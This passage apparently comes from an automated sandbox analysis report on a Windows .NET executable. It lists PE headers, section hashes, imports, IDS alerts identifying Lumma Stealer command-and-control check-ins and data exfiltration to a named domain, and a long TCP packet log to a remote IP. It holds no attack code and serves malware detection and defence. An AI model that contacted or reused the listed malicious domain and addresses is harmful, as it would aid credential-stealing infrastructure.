                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc2f00x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x5b0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0xc2d40x1c.text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000xa3480xa400abd98e17dabb73820961c263705d259fFalse0.24018673780487804data3.9056548187424664IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xe0000x5b00x600c4e0313830c3e1cae6ac422e5cf1f45fFalse0.4186197916666667data4.137287324477428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x100000xc0x20050e328932e35e54f33d1d8417285e696False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0xe0900x320data0.42375
                        RT_MANIFEST0xe3c00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-11-24T08:35:36.997805+01002057670ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sector-essay .cyou)1192.168.2.5617461.1.1.153UDP
                        2024-11-24T08:35:38.621322+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549705104.21.47.136443TCP
                        2024-11-24T08:35:38.621322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.47.136443TCP
                        2024-11-24T08:35:39.319394+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.47.136443TCP
                        2024-11-24T08:35:39.319394+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.47.136443TCP
                        2024-11-24T08:35:40.735887+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549706104.21.47.136443TCP
                        2024-11-24T08:35:40.735887+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.47.136443TCP
                        2024-11-24T08:35:41.446509+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.47.136443TCP
                        2024-11-24T08:35:41.446509+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.47.136443TCP
                        2024-11-24T08:35:42.937475+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549707104.21.47.136443TCP
                        2024-11-24T08:35:42.937475+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.47.136443TCP
                        2024-11-24T08:35:44.950948+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549708104.21.47.136443TCP
                        2024-11-24T08:35:44.950948+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.47.136443TCP
                        2024-11-24T08:35:47.056522+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549709104.21.47.136443TCP
                        2024-11-24T08:35:47.056522+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.47.136443TCP
                        2024-11-24T08:35:49.322834+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549710104.21.47.136443TCP
                        2024-11-24T08:35:49.322834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.47.136443TCP
                        2024-11-24T08:35:50.066874+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549710104.21.47.136443TCP
                        2024-11-24T08:35:51.956377+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549711104.21.47.136443TCP
                        2024-11-24T08:35:51.956377+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549711104.21.47.136443TCP
                        2024-11-24T08:35:51.960983+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549711104.21.47.136443TCP
                        2024-11-24T08:35:55.574111+01002057671ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI)1192.168.2.549722104.21.47.136443TCP
                        2024-11-24T08:35:55.574111+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.21.47.136443TCP
                        2024-11-24T08:35:56.299081+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549722104.21.47.136443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 24, 2024 08:35:33.931991100 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:34.052265882 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:34.052354097 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:34.052654982 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:34.172178984 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318037033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318114042 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318150997 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318185091 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318218946 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318252087 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318288088 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318300962 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.318300962 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.318320990 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318351030 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.318355083 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318382978 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.318392038 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.318438053 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.438220024 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.438249111 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.438494921 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.510248899 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.510286093 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.510510921 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.514478922 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.514601946 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.514667988 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.522814989 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.522887945 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.522955894 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.531157017 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.531238079 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.531322956 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.539550066 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.539660931 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.539721012 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.547961950 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.548033953 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.548110962 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.556304932 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.556329966 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.556416988 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.564666986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.564690113 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.564766884 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.573101044 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.573164940 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.573232889 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.581479073 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.581556082 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.581609964 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.589804888 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.589821100 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.589901924 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.702856064 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.702891111 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.703104973 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.705301046 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.705308914 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.705372095 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.709177971 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.709244967 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.709295988 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.714179993 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.714279890 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.714375973 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.719222069 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.719332933 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.719409943 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.724215031 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.724284887 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.724380970 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.729070902 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.729098082 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.729170084 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.733927011 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.734150887 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.734265089 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.738787889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.738847017 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.738924026 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.743547916 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.743655920 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.743733883 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.748394966 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.748498917 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.748584986 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.753218889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.753345966 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.753407955 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.758081913 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.758147001 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.758224010 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.763125896 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.763137102 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.763205051 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.767708063 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.767769098 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.767838001 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.772566080 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.772613049 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.772671938 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.895613909 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.895844936 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.895920992 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.897653103 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.897732973 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.897841930 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.901541948 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.901719093 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.901823997 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.905560970 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.905708075 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.905762911 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.909508944 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.909594059 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.909643888 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.913503885 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.913618088 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.913674116 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.917505980 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.917588949 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.917643070 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.921485901 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.921722889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.921785116 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.925474882 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.925576925 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.925628901 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.929488897 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.929613113 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.929754019 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.933466911 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.933546066 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.933644056 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.937491894 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.937606096 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.937674999 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.941445112 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.941567898 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.941636086 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.945485115 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.945524931 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.945594072 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.949450016 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.949568987 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.949652910 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.953500986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.953572989 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.953660011 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.957444906 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.957540035 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.957652092 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.961438894 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.961535931 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.961591005 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.965450048 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.965570927 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.965641975 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.969520092 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.969547033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.969604015 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.973479033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.973536015 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.973599911 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.977535009 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.977658033 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.977718115 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.981448889 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.981544018 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.981604099 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.985511065 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.985615015 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.985677004 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.989437103 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.989509106 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:35.989586115 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:35.993473053 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.042932987 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.086972952 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.087160110 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.087255001 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.088696957 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.088747025 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.088927031 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.092194080 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.092302084 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.092510939 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.095659971 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.095769882 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.095854044 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.099215984 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.099350929 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.099415064 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.102549076 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.102646112 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.102724075 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.105815887 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.105971098 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.106069088 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.109034061 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.109173059 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.109258890 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.112154961 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.112267971 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.112323046 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.115207911 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.115340948 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.115411997 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.118222952 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.118304014 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.118355036 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.121198893 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.121309996 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.121396065 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.124187946 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.124223948 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.124325991 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.127190113 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.127223969 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.127311945 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.130641937 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.130692959 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.130759954 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.133183956 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.133258104 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.133327961 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.136164904 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.136251926 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.136343002 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.139157057 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.139266968 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.139334917 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.142128944 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.142240047 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.142419100 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.145159960 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.145253897 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.145334959 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.148119926 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.148180008 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.148247957 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.151103973 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.151206017 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.151303053 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.154192924 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.154253960 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.154366016 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.157044888 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.157089949 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.157164097 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.160079002 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.160192013 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.160365105 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.163052082 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.163147926 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.163278103 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.166316986 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.166388988 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.166466951 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.169187069 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.169226885 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.169282913 CET4970480192.168.2.5147.45.44.131
                        Nov 24, 2024 08:35:36.172013044 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.172130108 CET8049704147.45.44.131192.168.2.5
                        Nov 24, 2024 08:35:36.172264099 CET4970480192.168.2.5147.45.44.131
